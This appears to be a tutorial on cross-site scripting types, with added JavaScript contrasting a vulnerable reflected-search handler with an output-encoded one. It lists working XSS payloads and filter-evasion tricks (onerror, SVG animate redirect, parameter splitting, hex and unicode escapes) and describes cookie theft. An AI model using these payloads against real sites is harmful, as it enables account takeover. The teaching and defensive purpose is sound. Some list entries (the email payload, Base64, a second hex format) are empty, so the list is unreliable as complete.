What are the types of Cross-Site Scripting vulnerability?
Cross-site Scripting can be classified into three major categories — Stored XSS, Reflected XSS, and DOM-based XSS.
Stored Cross-Site Scripting (Persistent XSS) Vulnerability
In stored XSS the payload is saved by the application (for example in a comment, profile field or message) and served to every user who later views that content. A payload that steals the victim's session cookie lets the attacker take over the user's account and read the user's personal information.
Reflected Cross-Site Scripting Vulnerability
In a reflected XSS attack the payload travels with the request itself, typically in a URL parameter or form field, and the server's response echoes it back into the page without encoding, so it executes in the victim's browser. Because reflected XSS is not persistent, the attacker has to deliver the payload to each victim individually, for example as a crafted link sent by email or through another social-engineering channel, usually in order to steal cookies or session IDs.
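To make the reflected case concrete, the following is an added example, not code from the original page: a minimal Node.js search handler that reflects the q parameter. The handler names, the parameter name and the page layout are assumptions made for illustration; the payload is the img/onerror one used on this page. It runs stand-alone with no dependencies.

```javascript
// Added example (not from the original page): a "search" page that reflects
// the ?q= parameter. renderUnsafe() concatenates it straight into HTML, which
// is the reflected XSS pattern; renderSafe() applies output encoding at the
// sink. Handler names, parameter name and markup are assumptions.

// The img/onerror payload from the page, as it would arrive in a crafted link.
const PAYLOAD = '<img src=x onerror=alert(String.fromCharCode(88,83,83));>';

// Encode the characters that can break out of an HTML text or
// quoted-attribute context.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Pull the q parameter out of the request URL the way a server would
// (URL decoding happens here, so the browser-encoded link yields raw markup).
function getQuery(url) {
  return new URL(url).searchParams.get('q') ?? '';
}

// Vulnerable: the untrusted value is concatenated into markup unchanged.
function renderUnsafe(url) {
  const q = getQuery(url);
  return '<p>Results for: ' + q + '</p>';
}

// Hardened: the same page with HTML encoding applied where the value is emitted.
function renderSafe(url) {
  const q = getQuery(url);
  return '<p>Results for: ' + htmlEncode(q) + '</p>';
}

// Check used below: does the rendered page contain a live img/onerror handler?
function containsLiveHandler(html) {
  return /<img\s[^>]*onerror=/i.test(html);
}

// Constructed victim link: the attacker URL-encodes the payload into q.
const link = 'https://site.example/search?q=' + encodeURIComponent(PAYLOAD);
console.log(renderUnsafe(link)); // handler lands in the page verbatim
console.log(renderSafe(link));   // &lt;img ... is inert text
```

The fix is output encoding at the point where the value is written into HTML, not input filtering: the same q value is accepted by both handlers, and only the sink decides whether the browser sees markup or text.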
Cross-Site Scripting (XSS) Payload Basics:
Example (the handler fires when the user hovers over the link, so it needs user interaction): <a onmouseover=alert('HERE ITS XSS')>I AM HERE </a>
In the payload below, the img tag tries to load an image named x. No such resource exists on the web server, so the load fails and the onerror handler runs without any user interaction, popping an alert. String.fromCharCode(88,83,83) builds the string "XSS" without using quote characters, which helps where quotes are filtered.
Example: <img src=x onerror=alert(String.fromCharCode(88,83,83));>
Below are a few more XSS payloads:
- When input validation blocks event handlers, SVG animation elements such as <animate> can be used instead. In the payload below, <animate> sets the href attribute of the enclosing <a> to //google.com, so clicking anywhere on the full-size rectangle redirects the user to google.com without any event handler attribute:
<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com></a></svg>
- Email fields are common in web forms and are usually validated only against the classic address format, i.e. something shaped like email@example.com. Since the check confirms only that the value looks like an address, a payload that keeps that valid shape passes the validation and still achieves XSS. Here it is:
- Where an input enforces a character-length limit, the payload can be split across several parameters that are reflected close together on the same page, so that the fragments reassemble into one working payload:
http://site.com/somefunction.php?session="oncut=" '&direct=true&from=true&r=select_down&plang=' |alert|
- Hex Encoding:
Hex encoding can be applied in two formats:
- Format 1: \x[HEX]
- Base64 Encoding:
- Unicode encoding: Unicode is a character standard with several encoding forms (UTF-8, UTF-16 and UTF-32); JavaScript's \u escapes for Unicode code points can be used to bypass XSS filters that match on literal characters. These escapes are decoded by the JavaScript lexer, so they work when the input is reflected inside a JavaScript string; the HTML parser does not interpret them.
Payload <script>alert(document.domain)</script> will be encoded as: \u003cscript\u003ealert(document.domain);\u003c/script\u003e
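The following is an added example, not code from the original page, covering two of the list items above: the \x and \u escape forms used to get past a filter that matches literal characters, and the email-format item, where a shape-only check accepts a payload that keeps the local@domain.tld form. The blocklist, the email pattern and the decoder are assumptions written for this example; the decoder mimics what a JavaScript lexer does with escapes inside a string literal so the demonstration runs without eval.

```javascript
// Added example (not from the original page). The blocklist, the email regex
// and the decoder below are assumptions for illustration.

// A naive filter of the kind these bypasses target: block on literal substrings.
const BLOCKED = ['<script', '<img', 'onerror', 'onload', 'javascript:'];
function naiveFilter(value) {
  const lower = value.toLowerCase();
  return !BLOCKED.some((word) => lower.includes(word)); // true = allowed
}

// Escape the characters in `chars` (default: just < and >) as JS hex
// (\xHH, code points below 256) or unicode (\uHHHH) escapes. BMP only.
function toJsEscapes(s, form, chars = '<>') {
  return Array.from(s).map((ch) => {
    if (!chars.includes(ch)) return ch;
    const cp = ch.codePointAt(0);
    if (form === 'hex' && cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0');
    return '\\u' + cp.toString(16).padStart(4, '0');
  }).join('');
}

// What a JavaScript lexer does with those escapes inside a string literal:
// both \x3c and \u003c become "<". The HTML parser performs no such decoding.
function decodeJsEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g, (_, hex, uni) =>
    String.fromCharCode(parseInt(hex ?? uni, 16)));
}

// Format validation is not output encoding: a shape-only email check (an
// assumed pattern typical of "looks like an address" validation) accepts any
// local part without whitespace or @, markup included.
function looksLikeEmail(value) {
  return /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(value);
}

const payload = '<script>alert(document.domain)</script>';
const unicodeForm = toJsEscapes(payload, 'unicode'); // \u003cscript\u003e...
const hexForm = toJsEscapes(payload, 'hex');         // \x3cscript\x3e...

// The filter sees backslashes and digits, not "<script".
console.log(naiveFilter(payload), naiveFilter(unicodeForm), naiveFilter(hexForm));
// Reflected into  var q = "...";  the lexer restores the original markup, which
// then reaches whatever DOM sink (innerHTML, document.write) the page uses q in.
console.log(decodeJsEscapes(unicodeForm) === payload, decodeJsEscapes(hexForm) === payload);
// Valid shape, hostile content.
console.log(looksLikeEmail('<svg/onload=alert(1)>@example.com'));
```

The practical caveat in both halves is the same: a check on the input's appearance (a keyword blocklist, a format regex) says nothing about how the value is later interpreted at the sink, and the escape forms only pay off where that sink is a JavaScript string context.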
Some interesting payloads are listed here:
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<img src ?itworksonchrome?\/onerror = alert(1)
<? foo="><x foo='?><script>alert(1)</script>'>">
<sCript x>(((confirm)))``</script x>
Which payload works depends on the HTML context in which the input is reflected (tag body, attribute value, JavaScript string, and so on), so payloads should be adapted to the elements the application actually uses. If you have any doubts about XSS, leave a comment in the comment section below.